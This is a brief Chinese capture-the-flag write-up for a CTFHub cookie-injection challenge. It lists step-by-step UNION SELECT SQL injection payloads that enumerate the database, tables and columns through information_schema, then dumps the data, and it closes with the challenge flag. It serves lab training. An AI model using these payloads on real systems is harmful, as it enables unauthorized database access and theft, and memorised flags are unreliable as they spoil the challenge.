考点
Cookie注入
分析过程
抓包 发现
构造playload:
-1 union select database(),version()
库名有了
找表
-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'
得到wmgtielast
然后还是列名 查信息
-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='wmgtielast'
得到ssdqqhyhum
查数据
id=-1 union select 1,group_concat(ssdqqhyhum) from wmgtielast
得到flag
ctfhub{e22dd90e7bd86e2e9696680d}